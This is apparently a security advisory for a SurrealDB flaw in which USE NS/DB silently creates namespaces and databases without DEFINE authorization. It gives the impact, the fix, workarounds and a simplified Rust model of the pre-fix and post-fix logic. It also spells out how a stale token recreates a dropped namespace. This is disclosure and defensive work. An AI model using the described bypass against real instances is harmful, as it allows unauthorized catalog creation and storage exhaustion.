GHSA-wp87-mgvq-5j93 · MEDIUM · CVSS 6.5

SurrealDB: USE NS/DB implicit creation bypasses DEFINE authorization

Published Jul 1, 2026 · Updated Jul 1, 2026

Description

An anonymous caller could create new namespaces and databases on a running SurrealDB instance without holding `DEFINE NAMESPACE` or `DEFINE DATABASE` permission. `USE NS <name>` and `USE DB <name>` automatically create the target when it does not exist. The three places `USE` is handled — the RPC `use` method, `Datastore::process_use`, and the SurrealQL executor — did not check whether the caller was allowed to create the resource. Under default capabilities any session reached this path, including an unauthenticated guest.

### Impact

What an attacker **can** do:

- Create new namespaces and databases without `DEFINE NAMESPACE` / `DEFINE DATABASE` permission. An unauthenticated guest is enough under default capabilities.
- Recreate a parent namespace that an operator deliberately dropped, using a stale namespace-Editor token, by running `USE NS <dropped> DB anything`.
- Exhaust catalog storage by repeatedly creating new resources.

What it **can't** do:

- Read or modify data inside any pre-existing namespace or database.
- Escalate to root or namespace-owner privileges on existing resources.
- Affect deployments running with `auth_enabled=false`.

### Patches

All three `USE` entry points now check whether the caller has `DEFINE NAMESPACE` / `DEFINE DATABASE` authority before creating a missing target. Sessions still update their context regardless of authorization, so SDKs that send `use` before `signin` continue to work — only the catalog creation step is gated. The parent-namespace side-effect path is closed by the same check.

Versions 3.1.0 and later are not affected.

### Workarounds

- Set `--deny-arbitrary-query *` for guest principals to remove the entry point.
- Run with `--auth` and require all callers to `signin` before issuing `use`.
- Revoke namespace-level tokens promptly when a namespace is dropped.
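The following added example models the behaviour described under Impact and Patches: the session context always updates, while catalog creation is gated on DEFINE authority. It is a simplified illustration, not SurrealDB source code; the `Caller` roles, their authority rules, and the `use_ns_db` and `run` helpers are assumptions made for the model.

```rust
use std::collections::{BTreeMap, BTreeSet};

// Simplified model of the advisory's logic; NOT SurrealDB source code.
// The roles and their DEFINE authority below are assumptions for illustration.
#[derive(Clone, Copy)]
enum Caller<'a> { Guest, NsEditor(&'a str), Root }

impl Caller<'_> {
    fn may_define_ns(self) -> bool { matches!(self, Caller::Root) }
    fn may_define_db(self, ns: &str) -> bool {
        matches!(self, Caller::Root) || matches!(self, Caller::NsEditor(own) if own == ns)
    }
}

#[derive(Default)]
struct Session { ns: Option<String>, db: Option<String> }

type Catalog = BTreeMap<String, BTreeSet<String>>; // namespace -> databases

/// Models `USE NS <ns> DB <db>`. `patched` selects pre-fix or post-fix behaviour.
fn use_ns_db(cat: &mut Catalog, s: &mut Session, who: Caller, ns: &str, db: &str, patched: bool) {
    // The session context always updates, so `use` before `signin` keeps working.
    s.ns = Some(ns.to_owned());
    s.db = Some(db.to_owned());
    if !cat.contains_key(ns) {
        // Pre-fix: a missing parent namespace is created as a side effect for anyone.
        if patched && !who.may_define_ns() { return; }
        cat.insert(ns.to_owned(), BTreeSet::new());
    }
    // Pre-fix: a missing database is created without any authority check.
    if !patched || who.may_define_db(ns) {
        cat.get_mut(ns).unwrap().insert(db.to_owned());
    }
}

/// Runs one `USE` against a catalog holding only namespace `existing`;
/// returns (namespace in catalog, database in catalog, session context set).
fn run(who: Caller, existing: &str, ns: &str, db: &str, patched: bool) -> (bool, bool, bool) {
    let mut cat = Catalog::new();
    cat.insert(existing.to_owned(), BTreeSet::new());
    let mut s = Session::default();
    use_ns_db(&mut cat, &mut s, who, ns, db, patched);
    let has_db = cat.get(ns).map_or(false, |d| d.contains(db));
    (cat.contains_key(ns), has_db, s.ns.as_deref() == Some(ns) && s.db.as_deref() == Some(db))
}

fn main() {
    // Constructed scenario: namespace "prod" was dropped, the editor token is stale.
    println!("{:?}", run(Caller::NsEditor("prod"), "other", "prod", "x", false));
    println!("{:?}", run(Caller::NsEditor("prod"), "other", "prod", "x", true));
}
```

In the patched branch a namespace editor can still create a missing database inside a namespace that exists, which is the legitimate path the fix preserves.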

Affected Packages (1)

surrealdb (Cargo)
Fixed in 3.1.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
